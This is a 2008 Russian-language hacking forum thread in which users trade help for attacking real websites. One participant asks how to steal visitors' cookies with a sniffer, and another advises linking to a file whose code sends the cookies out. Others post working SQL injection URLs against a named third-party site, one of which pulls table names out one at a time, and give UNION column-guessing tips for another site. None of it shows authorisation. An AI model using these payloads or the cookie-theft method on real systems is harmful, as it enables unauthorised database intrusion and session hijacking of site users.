 |
|
21.01.2008, 16:59
|
|
Новичок
Регистрация: 19.01.2008
Сообщений: 19
С нами:
9636717
Репутация:
11
|
|
Сообщение от Macro
Так, как я написал про рамблер... Точно так же сработает
но как я туда вставлю ссылку на сниффер? он ведь картинкой! а если я просто путь вставлю то кукисы не придут точнее придут но не кукисы а так мусор
|
|
|
21.01.2008, 17:00
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
С нами:
10261766
Репутация:
1079
|
|
Сообщение от frigid20
но как я туда вставлю ссылку на сниффер? он ведь картинкой! а если я просто путь вставлю то кукисы не придут точнее придут но не кукисы а так мусор
Ссылку не на сниффер, а на файл, в котором код, отправляющий куки на сниффер
|
|
|
|
21.01.2008, 17:33
|
|
Новичок
Регистрация: 19.01.2008
Сообщений: 19
С нами:
9636717
Репутация:
11
|
|
Сообщение от Macro
Ссылку не на сниффер, а на файл, в котором код, отправляющий куки на сниффер
мм... я пока плохо разбираюсь в этом( а какой должен быть код в файле?
|
|
|
|
21.01.2008, 17:49
|
|
Новичок
Регистрация: 19.01.2008
Сообщений: 9
С нами:
9636659
Репутация:
5
|
|
Сообщение от Scipio
2PunkAss извини не было времени посмотреть, но вобщем то вот как твои проблеммы решаются:
Код:
http://cleverclub.nashe.ru/rating_d.asp?sender=1'/**/or/**/cast(@@version/**/as/**/int)='1
отлично, спс  а можно этот запрос составить так, чтобы узнать какие ещё есть таблицы, а то тут только селект по одной таблице получается...
|
|
|
|
21.01.2008, 18:23
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
Хм, тут нарисовалась трабла. Я проводил скулю на сайтенге, и при -1 union select 1/*
выдается ошибка The used SELECT statements have a different number of columns, хотя order by показывает что полей именно 1, но это не важно, я начал работать с подзапросами и при -1 union select 1 from users/* вылезла ошибка Table 'dk.users' doesn't exist а при запросе -1 union select 1 from information_schema.tables почему то опять же вылезла The used SELECT statements have a different number of columns Значит ли это что information_schema.tables существует и к ней есть доступ ?
|
|
|
|
21.01.2008, 18:31
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
С нами:
10263386
Репутация:
849
|
|
Да. доступ к таблице есть.
Запросов может быть несколько.
пробуй union select 1,2/* и тд. пока не попадешь на праильное кол-во колонок
|
|
|
|
21.01.2008, 18:38
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
Да. доступ к таблице есть.
Запросов может быть несколько.
пробуй union select 1,2/* и тд. пока не попадешь на праильное кол-во колонок
А разве если бы кол-во колонок было неверное мне бы выпадало Table 'dk.users' doesn't exist ?
А, все, пасиб Basurman
Подбирать поля - лень, я нашел более удобную скулю на этом же сайте, доступ к information_schema действительно существует =) Еще раз всем пасиб
Последний раз редактировалось 0nep@t0p; 21.01.2008 в 18:49..
|
|
|
|
21.01.2008, 18:45
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
С нами:
10263386
Репутация:
849
|
|
да. именно так и происходит
|
|
|
|
21.01.2008, 23:12
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от PunkAss
отлично, спс а можно этот запрос составить так, чтобы узнать какие ещё есть таблицы, а то тут только селект по одной таблице получается... вот смотри:
Код:
http://cleverclub.nashe.ru/rating_d.asp?sender=1'/**/or/**/cast((SELECT/**/TOP/**/1/**/table_name/**/From/**/information_schema.tables/**/where/**/table_name/**/not/**/in/**/('Rating1','HelpMessage'))/**/as/**/int)='1
в скобки, которые после not in подставляй очередное полученное имя таблицы и таким образом перебирай имена всех таблиц, а вобще почитай вот эту статью: Провидение Иньекций в MSSQL сервер от Microsoft
__________________
Карфаген должен быть разрушен...
|
|
|
|
22.01.2008, 00:30
|
|
Новичок
Регистрация: 19.01.2008
Сообщений: 9
С нами:
9636659
Репутация:
5
|
|
Сообщение от Scipio
текст
можно было просто тыкнуть в статью, я её не читал  пасиба, вопрос закрыт.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
